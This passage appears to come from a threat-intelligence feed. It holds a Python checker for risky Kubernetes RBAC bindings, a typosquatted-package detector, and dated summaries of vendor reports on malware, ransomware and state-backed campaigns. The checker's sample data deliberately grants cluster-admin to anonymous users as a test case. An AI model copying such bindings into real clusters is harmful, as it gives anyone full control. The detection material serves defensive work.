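            "subjects": [
                {"kind": "Group", "name": "system:authenticated"},
                {"kind": "Group", "name": "system:unauthenticated"},
            ],
        },
        {   # Normal: cluster-admin limited to the system:masters group.
            "metadata": {"name": "cluster-admin"},
            "roleRef": {"kind": "ClusterRole", "name": "cluster-admin"},
            "subjects": [{"kind": "Group", "name": "system:masters"}],
        },
        {   # Misconfiguration: full admin for callers with no credentials.
            "metadata": {"name": "oops-anon-admin"},
            "roleRef": {"kind": "ClusterRole", "name": "cluster-admin"},
            "subjects": [{"kind": "User", "name": "system:anonymous"}],
        },
        {   # Misconfiguration: edit for every holder of any valid token.
            "metadata": {"name": "everyone-edit"},
            "roleRef": {"kind": "ClusterRole", "name": "edit"},
            "subjects": [{"kind": "Group", "name": "system:authenticated"}],
        },
    ],
})

if __name__ == "__main__":
    for f in risky_bindings(SAMPLE_KUBECTL_JSON):
        print(f"{f['severity']:8} {f['binding']}: {f['role']} -> {f['subject']}")
```

Run it against real output by piping `kubectl get clusterrolebindings -o json` into `risky_bindings`; namespaced RoleBindings use the same `subjects`/`roleRef` shape and can be fed through the same function. A clean result does not mean the API server is safe to expose: the finding the researchers describe is clusters reachable from the internet at all, and RBAC is only the second line.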
2023-08-09
Malicious_Python_Package_Campaign_Targets_Developers_through_PyPI
MEDIUM
+
Intel Source:
ReversingLabs
Intel Name:
Malicious_Python_Package_Campaign_Targets_Developers_through_PyPI
Date of Scan:
2023-08-09
Impact:
MEDIUM
Summary:
Researchers from ReversingLabs identified a persistent campaign that leverages malicious Python packages on PyPI to deceive developers. The attackers mimic popular open-source tools, embedding hidden malicious code, create matching GitHub repositories for credibility, and employ dynamic command and control URLs.
Source: https://www.reversinglabs.com/blog/vmconnect-malicious-pypi-packages-imitate-popular-open-source-modules
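Both this entry and the FortiGuard PyPI entry above describe packages that trade on the names of popular modules. As an added example (not code from the ReversingLabs or Fortinet research), the check below scores names in a dependency list against a constructed allowlist of popular packages: a name that is not itself on the list but sits within a couple of edits of one, or is a popular name with a token bolted on, is returned as a review candidate. Package names are normalized the way PyPI does it (case-folded, with runs of `-`, `_` and `.` collapsed), so `Requests` and `requests` compare equal while `reqeusts` does not.

```python
"""Surface dependency names that look like impersonations of popular packages.

Added example, not from the Fortinet or ReversingLabs posts. POPULAR and the
requested names in __main__ are constructed; in practice the list would come
from a curated allowlist or registry download statistics.
"""
import re

POPULAR = ["requests", "urllib3", "numpy", "pandas", "boto3", "cryptography", "setuptools"]


def normalize(name):
    """PEP 503 style normalization: case-fold and collapse runs of -, _ and . to '-'."""
    return re.sub(r"[-_.]+", "-", name).lower()


def levenshtein(a, b):
    """Plain edit distance (insert, delete, substitute); transpositions count as two edits."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def typosquat_candidates(requested, popular=POPULAR, max_distance=2):
    """Return (requested, popular, reason) tuples for names that warrant review.

    A name is flagged when it is not itself popular but is within `max_distance`
    edits of a popular name, or consists of a popular name plus an extra token
    (e.g. 'numpy-utils'), the look-alike pattern used by the campaigns above.
    """
    pop = sorted({normalize(p) for p in popular})  # sorted: deterministic matching order
    findings = []
    for req in requested:
        n = normalize(req)
        if n in pop:
            continue
        for p in pop:
            d = levenshtein(n, p)
            if d <= max_distance:
                findings.append((req, p, f"edit distance {d}"))
                break
            if n.startswith(p + "-") or n.endswith("-" + p):
                findings.append((req, p, "popular name with added token"))
                break
    return findings


if __name__ == "__main__":
    # Constructed requirements: one exact match, two near-misses, one bolt-on, one unrelated.
    wanted = ["requests", "reqeusts", "urlib3", "numpy-utils", "flask"]
    for req, pop, why in typosquat_candidates(wanted):
        print(f"review {req!r}: resembles {pop!r} ({why})")
```

Treat the output as a review queue, not a verdict: legitimate extensions such as `requests-oauthlib` match the bolt-on rule, and `max_distance=2` is noisy for very short names, so the threshold is worth tuning against your own allowlist. Name similarity is also only one signal the researchers describe; the matching GitHub repositories and dynamic C2 URLs in the VMConnect packages are not visible to a name check at all.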
2023-08-09
The_Malware_distribution_as_Coin_exchange
LOW
+
Intel Source:
ASEC
Intel Name:
The_Malware_distribution_as_Coin_exchange
Date of Scan:
2023-08-09
Impact:
LOW
Summary:
AhnLab Security Emergency response Center (ASEC) has recently discovered new malware disguised with coin exchange and investment-related themes. The malware takes the form of an executable and a Word file. It is suspected to have been created by the Kimsuky group.
Source: https://asec.ahnlab.com/en/55944/
2023-08-09
The_malware_installation_as_normal_file_of_a_Korean_Development_Company
LOW
+
Intel Source:
ASEC
Intel Name:
The_malware_installation_as_normal_file_of_a_Korean_Development_Company
Date of Scan:
2023-08-09
Impact:
LOW
Summary:
AhnLab has previously reported on malware delivered through the installation file of a Korean program development company. When malware is distributed alongside an installer, users struggle to notice that the malware is executing concurrently.
Source: https://asec.ahnlab.com/en/55940/
2023-08-09
Uncovering_Tech_Scammers_involved_in_different_ransomware_attacks
LOW
+
Intel Source:
Cyble
Intel Name:
Uncovering_Tech_Scammers_involved_in_different_ransomware_attacks
Date of Scan:
2023-08-09
Impact:
LOW
Summary:
Cyble researchers recently observed a new tech scam campaign in which scammers set up a fake antivirus site to deceive users into paying for non-existent services. During analysis, the researchers discovered various ransomware variants, built from leaked ransomware builders, that the scammers leveraged to propagate their fraudulent schemes.
Source: https://cyble.com/blog/utilization-of-leaked-ransomware-builders-in-tech-related-scams/
2023-08-09
The_AgentTesla_malware_attack
LOW
+
Intel Source:
Cyble
Intel Name:
The_AgentTesla_malware_attack
Date of Scan:
2023-08-09
Impact:
LOW
Summary:
Cyble Research and Intelligence Labs (CRIL) has recently observed an AgentTesla malware attack that employs a well-developed process with multiple stages. The campaign is designed to trick unsuspecting users into opening Tax related documents and accompanying control panel files (CPL).
Source: https://cyble.com/blog/agenttesla-malware-targets-users-with-malicious-control-panel-file/
2023-08-08
An_Overview_of_Qakbot_Infrastructure
LOW
+
Intel Source:
Team-Cymru
Intel Name:
An_Overview_of_Qakbot_Infrastructure
Date of Scan:
2023-08-08
Impact:
LOW
Summary:
Team Cymru researchers have provided an update on their high-level analysis of QakBot infrastructure. This is an ongoing piece of research; their analysis of QakBot is fluid, with various hypotheses being identified and tested, and they will provide further written updates as they uncover new insights into QakBot campaigns.
Source: https://www.team-cymru.com/post/visualizing-qakbot-infrastructure-part-ii-uncharted-territory
2023-08-08
Investigating_the_Big_Head_Ransomware
LOW
+
Intel Source:
SOC Radar
Intel Name:
Investigating_the_Big_Head_Ransomware
Date of Scan:
2023-08-08
Impact:
LOW
Summary:
Big Head ransomware, which first appeared in May 2023, is a relatively new actor in the cyber threat landscape. The malware comes in several different variants, each with its own features and capabilities. Little is known about the threat actor responsible for Big Head; the actor has been seen interacting with victims on Telegram and through email.
Source: https://socradar.io/dark-web-profile-big-head-ransomware/
2023-08-07
Water_minyades_batloader_malware
MEDIUM
+
Intel Source:
Trend Micro
Intel Name:
Water_minyades_batloader_malware
Date of Scan:
2023-08-07
Impact:
MEDIUM
Summary:
Trend Micro researchers observed that the Water Minyades BatLoader malware has evolved to use Pyarmor Pro obfuscation, making manual de-obfuscation difficult. Using large MSI files, it initiates a sophisticated kill chain, fingerprinting victim networks and delivering second-stage payloads for stealthy attacks.
Source: https://www.trendmicro.com/en_us/research/23/h/batloader-campaigns-use-pyarmor-pro-for-evasion.html
2023-08-07
TargetCompany_Ransomware_Abusing_FUD_Obfuscator_Packers
LOW
+
Intel Source:
TrendMicro
Intel Name:
TargetCompany_Ransomware_Abusing_FUD_Obfuscator_Packers
Date of Scan:
2023-08-07
Impact:
LOW
Summary:
To deploy its initial stage persistently, the most recent version of the TargetCompany ransomware first exploits weakly secured SQL servers. The code tries many approaches to achieve persistence, such as switching URLs or relevant paths, until it successfully finds a location to run the Remcos RAT.
Source: https://www.trendmicro.com/en_us/research/23/h/targetcompany-ransomware-abuses-fud-obfuscator-packers.html
2023-08-07
DoDo_and_Proton_Ransomware_targeting_windows_users
MEDIUM
+
Intel Source:
Fortinet
Intel Name:
DoDo_and_Proton_Ransomware_targeting_windows_users
Date of Scan:
2023-08-07
Impact:
MEDIUM
Summary:
Fortinet's Ransomware Roundup report highlights the emerging DoDo and Proton ransomware variants, both designed to target Microsoft Windows users. DoDo ransomware, a derivative of Chaos ransomware, disguises itself as an educational application called "Mercurial Grabber" to steal information and encrypt victims' files. Its recent variants demand a ransom for file decryption and data non-disclosure. Proton ransomware encrypts files on Windows systems and demands a ransom for file recovery.
Source: https://www.fortinet.com/blog/threat-research/ransomware-roundup-dodo-and-proton
2023-08-07
North_Korea_icompromised_Russian_Missile_Engineering_Company
MEDIUM
+
Intel Source:
SentinelOne
Intel Name:
North_Korea_icompromised_Russian_Missile_Engineering_Company
Date of Scan:
2023-08-07
Impact:
MEDIUM
Summary:
SentinelLabs identified an intrusion into the Russian defense industrial base, specifically the missile engineering organization NPO Mashinostroyeniya. Their analysis attributes the email server compromise to the ScarCruft threat actor. They also identified the separate use of a Lazarus Group backdoor to compromise the organization's internal network.
Source: https://www.sentinelone.com/labs/comrades-in-arms-north-korea-compromises-sanctioned-russian-missile-engineering-company/
2023-08-07
NPM_highly_targeted_attacks
LOW
+
Intel Source:
Security Affairs
Intel Name:
NPM_highly_targeted_attacks
Date of Scan:
2023-08-07
Impact:
LOW
Summary:
Security Affairs reported on a new set of malicious packages on the npm package manager that can exfiltrate sensitive developer data.
Source: https://securityaffairs.com/149165/hacking/npm-highly-targeted-attacks.html
2023-08-07
New_Threat_Actor_Leveraging_Customized_Yashma_Ransomware
LOW
+
Intel Source:
Talos
Intel Name:
New_Threat_Actor_Leveraging_Customized_Yashma_Ransomware
Date of Scan:
2023-08-07
Impact:
LOW
Summary:
Cisco Talos researchers have identified an unknown threat actor, apparently of Vietnamese origin, who has been operating ransomware since at least June 4, 2023. The ongoing attack uses a Yashma ransomware variant that mimics WannaCry traits and appears intended to target several locations. The threat actor delivers the ransom note in an unusual way: rather than embedding the ransom note strings in the malware, it executes an embedded batch file that downloads the ransom note from an actor-controlled GitHub repository.
Source: https://blog.talosintelligence.com/new-threat-actor-using-yashma-ransomware/
2023-08-07
MerlinAgent_cyber_attacks_against_Ukraine
LOW
+
Intel Source:
CERT UA
Intel Name:
MerlinAgent_cyber_attacks_against_Ukraine
Date of Scan:
2023-08-07
Impact:
LOW
Summary:
Ukraine's CERT-UA is warning of malicious emails posing as official communications. The emails contain harmful attachments that lead to the execution of malicious scripts and the deployment of the malicious "ctlhost.exe" associated with the MerlinAgent program.
Source: https://cert.gov.ua/article/5391805
2023-08-05
The_Cyber_Campaign_by_Space_Pirates_in_Russia_and_Serbia
MEDIUM
+
Intel Source:
PT Security
Intel Name:
The_Cyber_Campaign_by_Space_Pirates_in_Russia_and_Serbia
Date of Scan:
2023-08-05
Impact:
MEDIUM
Summary:
Using unique strategies and acquiring new cyber weapons, the threat actor known as Space Pirates has been connected to attacks on at least 16 organizations in Serbia and Russia over the past year. Governmental organizations, educational institutions, private security firms, aerospace makers, agricultural producers, defense, energy, and healthcare companies are among the targets.
Source: https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/space-pirates-a-look-into-the-group-s-unconventional-techniques-new-attack-vectors-and-tools/
2023-08-04
Botnet_Fenix_new_botnet
LOW
+
Intel Source:
MetaBase Q
Intel Name:
Botnet_Fenix_new_botnet
Date of Scan:
2023-08-04
Impact:
LOW
Summary:
The Threat Intel team at Metabase Q has discovered a local group that created a new botnet called “Fenix,” which specifically targets users accessing government services, particularly taxpayers in Mexico and Chile. The attackers redirect victims to fraudulent websites that mimic the official portals. These fake websites prompt users to download a supposed security tool, claiming it will make navigating the portal safer.
Source: https://www.metabaseq.com/fenix-botnet/
2023-08-04
Remcos_Malware_Analysis
LOW
+
Intel Source:
Any.Run
Intel Name:
Remcos_Malware_Analysis
Date of Scan:
2023-08-04
Impact:
LOW
Summary:
Any.Run's malware hunting service recorded a video of Remcos RAT execution and analysis. Remcos is a remote access trojan, a type of malware used to take remote control of infected PCs. The trojan is created and sold to clients by a “business” called Breaking Security. Remcos can be delivered in different forms: based on the analysis, it can be spread as an executable file whose name is meant to convince users to open it, or it can pretend to be a Microsoft Word file that exploits vulnerabilities.
Source: https://any.run/malware-trends/remcos
2023-08-04
The_Attack_Method_of_Rhysida_Ransomware
LOW
+
Intel Source:
SOC Radar
Intel Name:
The_Attack_Method_of_Rhysida_Ransomware
Date of Scan:
2023-08-04
Impact:
LOW
Summary:
The Rhysida Ransomware Group has become a serious threat in the online environment. In a short period of time, Rhysida posed a significant concern to businesses all across the world with its powerful encryption capabilities and double extortion tactics. The group's emphasis on attacking military and governmental institutions, as seen in their assault on the Chilean Army, emphasizes how serious their actions may be.
Source: https://socradar.io/threat-profile-rhysida-ransomware/
2023-08-04
The_Play_ransomware_activity
MEDIUM
+
Intel Source:
TrendMicro
Intel Name:
The_Play_ransomware_activity
Date of Scan:
2023-08-04
Impact:
MEDIUM
Summary:
Trend Micro has observed the Play ransomware group amplify its activity with a number of new tools and exploits, including the ProxyNotShell and OWASSRF vulnerabilities and a Microsoft Exchange Server remote code execution flaw. More recently, the group has also begun to use new tools such as Grixba, a custom network scanner and infostealer, and the open-source VSS management tool AlphaVSS.
Source: https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-play
2023-08-04
Emotet_DarkGate_and_LokiBot_new_analyses
MEDIUM
+
Intel Source:
Securelist
Intel Name:
Emotet_DarkGate_and_LokiBot_new_analyses
Date of Scan:
2023-08-04
Impact:
MEDIUM
Summary:
Securelist researchers found new Emotet samples, a new loader dubbed “DarkGate”, and a new LokiBot infostealer campaign. They described all three in private reports, from which this post contains an excerpt.
Source: https://securelist.com/emotet-darkgate-lokibot-crimeware-report/110286/
2023-08-04
From_Small_LNK_to_Large_Malicious_BAT_File_With_Zero_VT_Score
LOW
+
Intel Source:
ISC.SANS
Intel Name:
From_Small_LNK_to_Large_Malicious_BAT_File_With_Zero_VT_Score
Date of Scan:
2023-08-04
Impact:
LOW
Summary:
An ISC SANS handler's spam trap caught an e-mail with an LNK attachment; the message was the usual malspam fare, attempting to pass as a purchase order sent to the recipient.
Source: https://isc.sans.edu/diary/From+small+LNK+to+large+malicious+BAT+file+with+zero+VT+score/30094/
2023-08-04
The_Back_to_School_Scams
LOW
+
Intel Source:
McAfee
Intel Name:
The_Back_to_School_Scams
Date of Scan:
2023-08-04
Impact:
LOW
Summary:
McAfee Labs analysts have discovered PDFs exploiting back-to-school trends. Their article advises parents on what to teach their children and how to avoid falling victim to such fraud. McAfee Labs encountered a PDF file campaign featuring a fake CAPTCHA on its first page, ostensibly to verify human interaction.
Source: https://www.mcafee.com/blogs/other-blogs/mcafee-labs/the-season-of-back-to-school-scams/
2023-08-04
Redline_Malware_Analysis
LOW
+
Intel Source:
Any Run
Intel Name:
Redline_Malware_Analysis
Date of Scan:
2023-08-04
Impact:
LOW
Summary:
ANY.RUN researchers did the analysis and watched the RedLine malware actions in an interactive sandbox simulation. RedLine Stealer or RedLine is malware that can collect users’ confidential information and deliver other malicious programs.
Source: https://any.run/malware-trends/redline
2023-08-04
New_Rilide_Stealer_Version
LOW
+
Intel Source:
Trustwave
Intel Name:
New_Rilide_Stealer_Version
Date of Scan:
2023-08-04
Impact:
LOW
Summary:
Trustwave SpiderLabs researchers have identified a new version of the Rilide stealer that targets banking data and works around Google Chrome's Manifest V3 restrictions.
Source: https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/new-rilide-stealer-version-targets-banking-data-and-works-around-google-chrome-manifest-v3/
2023-08-03
Hackers_Sent_Phishing_Emails_Masquerading_as_Microsoft_Teams_Chats
MEDIUM
+
Intel Source:
Microsoft
Intel Name:
Hackers_Sent_Phishing_Emails_Masquerading_as_Microsoft_Teams_Chats
Date of Scan:
2023-08-03
Impact:
MEDIUM
Summary:
In "highly targeted social engineering attacks," Russian state-sponsored hackers used Microsoft Teams chats as phishing lures. Microsoft announced on Wednesday that it had discovered a campaign by the well-known Russian group Midnight Blizzard, also known as NOBELIUM, Cozy Bear, or APT29. According to U.S. and U.K. law enforcement organizations, the group is a component of the Russian Federation's Foreign Intelligence Service.
Source: https://www.microsoft.com/en-us/security/blog/2023/08/02/midnight-blizzard-conducts-targeted-social-engineering-over-microsoft-teams/
2023-08-03
Illicit_Brand_Impersonation
LOW
+
Intel Source:
SentinelOne
Intel Name:
Illicit_Brand_Impersonation
Date of Scan:
2023-08-03
Impact:
LOW
Summary:
SentinelOne researchers continually observe brands being impersonated for illicit use, including credential phishing and malware delivery. In their blog they share examples of opportunistic and targeted threat actors impersonating trusted brands, and describe new tooling that can be used to hunt for and track them going forward.
Source: https://www.sentinelone.com/blog/illicit-brand-impersonation-a-threat-hunting-approach/
2023-08-03
Linux_Systems_Are_Affected_by_Reptile_Malware
LOW
+
Intel Source:
ASEC
Intel Name:
Linux_Systems_Are_Affected_by_Reptile_Malware
Date of Scan:
2023-08-03
Impact:
LOW
Summary:
ASEC has recently observed Reptile, an open-source Linux rootkit with powerful concealment features and port-knocking capabilities. The report examines real-world attacks, including those targeting Korean companies, and draws parallels to the Mélofée malware.
Source: https://asec.ahnlab.com/en/55785/
2023-08-03
Sliver_C2_malware_being_distributed
LOW
+
Intel Source:
ASEC
Intel Name:
Sliver_C2_malware_being_distributed
Date of Scan:
2023-08-03
Impact:
LOW
Summary:
ASEC has recently observed malware similar to the earlier SparkRAT cases being distributed disguised as setup files for Korean VPN service providers and marketing program producers. Unlike the past cases where SparkRAT was used, Sliver C2 was used in the recent attacks, and techniques to avoid detection were employed.
Source: https://asec.ahnlab.com/en/55652/
2023-08-03
Russian_APT_BlueCharlie_Swaps_Infrastructure_to_Evade_Detection
LOW
+
Intel Source:
Recorded Future
Intel Name:
Russian_APT_BlueCharlie_Swaps_Infrastructure_to_Evade_Detection
Date of Scan:
2023-08-03
Impact:
LOW
Summary:
Researchers from Recorded Future have identified the latest campaign from BlueCharlie. The group completely switched up its infrastructure, creating nearly 100 new domains from which to perform credential harvesting and follow-on espionage attacks.
Source: https://go.recordedfuture.com/hubfs/reports/cta-2023-0802.pdf
2023-08-02
Attackers_Exploiting_Ivanti_EPMM_Vulnerabilities
MEDIUM
+
Intel Source:
CISA
Intel Name:
Attackers_Exploiting_Ivanti_EPMM_Vulnerabilities
Date of Scan:
2023-08-02
Impact:
MEDIUM
Summary:
In response to the active exploitation of CVE-2023-35078 and CVE-2023-35081, the Cybersecurity and Infrastructure Security Agency (CISA) and the Norwegian National Cyber Security Centre (NCSC-NO) have released a joint cybersecurity advisory. From at least April 2023 to July 2023, advanced persistent threat actors used CVE-2023-35078 as a zero-day exploit to collect data from a number of Norwegian enterprises as well as to access and compromise the network of a Norwegian government agency.
Source: https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-213a
2023-08-02
New_P2Pinfect_Malware_Campaign_Against_Redis_Servers_Detailed
LOW
+
Intel Source:
Cado Security
Intel Name:
New_P2Pinfect_Malware_Campaign_Against_Redis_Servers_Detailed
Date of Scan:
2023-08-02
Impact:
LOW
Summary:
Researchers from Cado Security Labs have just discovered a brand-new malware campaign that targets Redis data store deployments that are open to the general public. The malware, which was created in Rust and given the name "P2Pinfect" by the creators, functions as a botnet agent. An embedded Portable Executable (PE) and an additional ELF executable are both included in the sample that researchers analyzed, indicating cross-platform compatibility between Windows and Linux.
Source: https://www.cadosecurity.com/redis-p2pinfect/
2023-08-02
Ransomware_Command_and_Control_Providers_report
LOW
+
Intel Source:
Halcyon
Intel Name:
Ransomware_Command_and_Control_Providers_report
Date of Scan:
2023-08-02
Impact:
LOW
Summary:
Halcyon researchers shared research that used new techniques to unmask another ransomware economy player that speeds up ransomware attacks and state-sponsored APT operations: command-and-control providers (C2P), which sell services to threat actors while maintaining a legal business profile. In their report, titled Cloudzy with a Chance of Ransomware, Halcyon showed a unique method for identifying C2P entities that can be used to forecast the precursors to major ransomware campaigns and other advanced attacks. Halcyon also identified two new, previously undisclosed ransomware affiliates, which it named Ghost Clown and Space Kook, that currently deploy BlackBasta and Royal, respectively.
Source: https://www.halcyon.ai/blog/report-ransomware-command-and-control-providers-unmasked-by-halcyon-researchers
2023-08-02
NodeStealer_2_0_The_Python_Version
LOW
+
Intel Source:
PaloAlto
Intel Name:
NodeStealer_2_0_The_Python_Version
Date of Scan:
2023-08-02
Impact:
LOW
Summary:
Unit 42 researchers have recently discovered a previously unreported phishing campaign that distributed an infostealer equipped to fully take over Facebook business accounts. Facebook business accounts were targeted with a phishing lure offering tools such as spreadsheet templates for busines
Source: https://unit42.paloaltonetworks.com/nodestealer-2-targets-facebook-business/
2023-08-02
New_Variant_of_SkidMap_Targeting_Redis
LOW
+
Intel Source:
Trustwave
Intel Name:
New_Variant_of_SkidMap_Targeting_Redis
Date of Scan:
2023-08-02
Impact:
LOW
Summary:
Researchers from Trustwave examined the most recent logs from a honeypot in central Europe and discovered an intriguing entry that reappeared less than two weeks later. SkidMap targets only open Redis instances (those with no authentication, "NO AUTH"). They have not noticed brute-force attacks coming from the exact IP address from which the initial attack started.
Source: https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/honeypot-recon-new-variant-of-skidmap-targeting-redis/
2023-08-01
WikiLoader_Favors_Complex_Evasion
LOW
+
Intel Source:
Proofpoint
Intel Name:
WikiLoader_Favors_Complex_Evasion
Date of Scan:
2023-08-01
Impact:
LOW
Summary:
WikiLoader is a new piece of malware that Proofpoint researchers have discovered. It was originally observed in December 2022 being delivered by TA544, an attacker who frequently targets Italian enterprises with Ursnif malware. They also noticed numerous subsequent campaigns, the majority of which targeted Italian organizations.
Source: https://www.proofpoint.com/us/blog/threat-insight/out-sandbox-wikiloader-digs-sophisticated-evasion
2023-08-01
URLs_That_Deliver_Ransomware
LOW
+
Intel Source:
PaloAlto
Intel Name:
URLs_That_Deliver_Ransomware
Date of Scan:
2023-08-01
Impact:
LOW
Summary:
Researchers from Palo Alto have seen that threat actors are increasingly using URLs to deliver ransomware as they look for new ways to get their creations past victims' defenses. They are also using more dynamic behaviors to spread their malware: in addition to the tried-and-true method of deploying polymorphic variants of their ransomware, threat actors frequently switch hostnames, paths, filenames, or a combination of all three to distribute it.
Source: https://unit42.paloaltonetworks.com/url-delivered-ransomware/#post-129339-_cfw3vjr99swz
2023-08-01
The_Unknown_Risks_of_Dot_Zip_Domains
LOW
+
Intel Source:
Avast
Intel Name:
The_Unknown_Risks_of_Dot_Zip_Domains
Date of Scan:
2023-08-01
Impact:
LOW
Summary:
Cybercriminals have begun using .zip domains to trick people into thinking they are downloadable files rather than URLs, according to Avast researchers. According to the research, one-third of the top 30 .zip domains blacklisted by threat detection engines misuse the names of well-known IT firms such as Microsoft, Google, Amazon, and PayPal to deceive users into thinking they are files from reputable businesses.
Source: https://decoded.avast.io/matejkrcma/unpacking-the-threats-within-the-hidden-dangers-of-zip-domains/
2023-08-01
The_Cunning_XWorms_Multi_Staged_Attack
LOW
+
Intel Source:
Cyble
Intel Name:
The_Cunning_XWorms_Multi_Staged_Attack
Date of Scan:
2023-08-01
Impact:
LOW
Summary:
The XWorm malware uses a new multistage approach to deliver its payload utilizing LOLBins, according to an analysis by Cyble researchers.
Source: https://cyble.com/blog/sneaky-xworm-uses-multistaged-attack/
2023-08-01
The_IcedID_BackConnect_Protocol_Internals
LOW
+
Intel Source:
Team-Cymru
Intel Name:
The_IcedID_BackConnect_Protocol_Internals
Date of Scan:
2023-08-01
Impact:
LOW
Summary:
Researchers from Team-Cymru have updated their investigation and monitoring of the infrastructure linked to IcedID's BackConnect protocol.
Source: https://www.team-cymru.com/post/inside-the-icedid-backconnect-protocol-part-2
2023-07-31
Threat_Actors_Abusing_the_Ad_Network
MEDIUM
+
Intel Source:
Bitdefender
Intel Name:
Threat_Actors_Abusing_the_Ad_Network
Date of Scan:
2023-07-31
Impact:
MEDIUM
Summary:
A threat actor with previous roots in cybercrime has shifted its initial access techniques to search engine advertisements, hijacking searches for business applications such as AnyDesk, WinSCP, Cisco AnyConnect, Slack, TreeSize and potentially more. Bitdefender research showed that the actor has successfully used this type of attack since late May 2023. Based on their threat insights, the attackers seem to focus exclusively on North America. So far, Bitdefender has identified six target organizations in the US and one in Canada.
Source: https://blogapp.bitdefender.com/labs/content/files/2023/07/Bitdefender-PR-WhitePaper-RatNitro-dex14210-en_EN.pdf
2023-07-31
STARK_MULE_Targeting_Koreans_With_US_Military_Themed_Document_Lures
MEDIUM
+
Intel Source:
Securonix Threat Labs
Intel Name:
STARK_MULE_Targeting_Koreans_With_US_Military_Themed_Document_Lures
Date of Scan:
2023-07-31
Impact:
MEDIUM
Summary:
Securonix researchers have detected an ongoing cyberattack campaign that targets Korean-speaking people, using document lures with American military themes to trick them into launching malware on compromised systems.
Source: https://www.securonix.com/blog/detecting-ongoing-starkmule-attack-campaign-targeting-victims-using-us-military-document-lures/
2023-07-31
Fruity_Trojan_Downloaders_Infect_Windows_Systems_in_Multiple_Stages
LOW
+
Intel Source:
Dr. Web
Intel Name:
Fruity_Trojan_Downloaders_Infect_Windows_Systems_in_Multiple_Stages
Date of Scan:
2023-07-31
Impact:
LOW
Summary:
Dr.Web researchers have observed that threat actors are creating fake websites hosting trojanized software installers to trick unsuspecting users into downloading a downloader malware called Fruity, with the goal of installing remote access trojans such as Remcos RAT.
Source: https://news.drweb.com/show/?i=14728&lng=en
2023-07-31
SEASPY_Backdoor
MEDIUM
+
Intel Source:
CISA
Intel Name:
SEASPY_Backdoor
Date of Scan:
2023-07-31
Impact:
MEDIUM
Summary:
CISA obtained two SEASPY malware samples. The malware was used by threat actors exploiting CVE-2023-2868, a former zero-day vulnerability affecting versions 5.1.3.001-9.2.0.006 of Barracuda Email Security Gateway (ESG). SEASPY is a persistent and passive backdoor that masquerades as a legitimate Barracuda service “BarracudaMailService” that allows the threat actors to execute arbitrary commands on the ESG appliance.
Source: https://www.cisa.gov/news-events/analysis-reports/ar23-209b
2023-07-31
v2_SUBMARINE_Backdoor
MEDIUM
+
Intel Source:
CISA
Intel Name:
v2_SUBMARINE_Backdoor
Date of Scan:
2023-07-31
Impact:
MEDIUM
Summary:
CISA, part of the US Department of Homeland Security, has released a report on a new type of backdoor malware that could be used by attackers to gain access to a network through its secure email gateway. CISA obtained seven malware samples related to a novel backdoor that CISA has named SUBMARINE. The malware was used by threat actors exploiting CVE-2023-2868, a former zero-day vulnerability affecting versions 5.1.3.001 - 9.2.0.006 of Barracuda Email Security Gateway (ESG).
Source: https://www.cisa.gov/news-events/analysis-reports/ar23-209a
2023-07-31
CISA_Analyses_Report_v1_Exploit_Payload_Backdoor
MEDIUM
+
Intel Source:
CISA
Intel Name:
CISA_Analyses_Report_v1_Exploit_Payload_Backdoor
Date of Scan:
2023-07-31
Impact:
MEDIUM
Summary:
CISA obtained 14 malware samples comprised of Barracuda exploit payloads and reverse shell backdoors. The malware was used by threat actors exploiting CVE-2023-2868, a former zero-day vulnerability affecting versions 5.1.3.001-9.2.0.006 of Barracuda Email Security Gateway (ESG). The payload triggers a command injection (exploiting CVE-2023-2868), leading to dropping and execution of reverse shells on the ESG appliance. The reverse shells establish backdoor communications via OpenSSL with threat actor command and control (C2) servers. The actors delivered this payload to the victim via a phishing email with a malicious .tar attachment.
Source: https://www.cisa.gov/news-events/analysis-reports/ar23-209c
2023-07-28
Behavioral_detection_tips_for_the_RomCom_campaign
MEDIUM
+
Intel Source:
Blackberry
Intel Name:
Behavioral_detection_tips_for_the_RomCom_campaign
Date of Scan:
2023-07-28
Impact:
MEDIUM
Summary:
This article provides a technical analysis of the RomCom threat group, which is targeting politicians in Ukraine and U.S.-based healthcare organizations. It outlines process activity, IoCs, and Sigma rules to detect malicious behavior, such as the execution of a file from the Temp folder with a specific command line, and the use of COM objects to establish system persistence.
Source: https://blogs.blackberry.com/en/2023/07/decoding-romcom-behaviors-and-opportunities-for-detection
2023-07-28
The_discovery_of_apps_targeting_Iranian_bank_customers
LOW
+
Intel Source:
Sophos
Intel Name:
The_discovery_of_apps_targeting_Iranian_bank_customers
Date of Scan:
2023-07-28
Impact:
LOW
Summary:
Sophos X-Ops researchers discovered malicious apps targeting Iranian banks, which collect internet banking login credentials and credit card details, and have capabilities such as hiding icons and intercepting SMS messages. The threat actors used Firebase as a C2 mechanism and leveraged legitimate domains for C2 servers. The malware also searches for other banking, payment, and cryptocurrency apps, and the certificate used to sign the malicious apps was previously used by an IT consulting and development firm in Malaysia. The malicious apps request permissions to read SMS messages and urge users to grant them.
Source: https://news.sophos.com/en-us/2023/07/27/uncovering-an-iranian-mobile-malware-campaign/
2023-07-28
A_New_Malicious_Campaign_Distributing_IT_Tools
LOW
+
Intel Source:
Sophos
Intel Name:
A_New_Malicious_Campaign_Distributing_IT_Tools
Date of Scan:
2023-07-28
Impact:
LOW
Summary:
Researchers from Sophos have discovered a new malvertising campaign that targets users looking for IT tools like AnyDesk, Cisco AnyConnect VPN, and WinSCP by using ads on Google Search and Bing. This campaign attempts to trick users into downloading trojanized installers in order to access corporate networks and possibly launch future ransomware attacks.
Source: https://news.sophos.com/en-us/2023/07/26/into-the-tank-with-nitrogen/
2023-07-28
BlueBravo_Attacks_European_Diplomatic_Entities
MEDIUM
+
Intel Source:
Recorded Future
Intel Name:
BlueBravo_Attacks_European_Diplomatic_Entities
Date of Scan:
2023-07-28
Impact:
MEDIUM
Summary:
In order to deliver a new backdoor named GraphicalProton, the Russian nation-state actor known as BlueBravo has been detected targeting diplomatic institutions across Eastern Europe, illustrating the threat's ongoing evolution. The use of legitimate internet services (LIS) for command-and-control (C2) obfuscation is a defining feature of the phishing campaign.
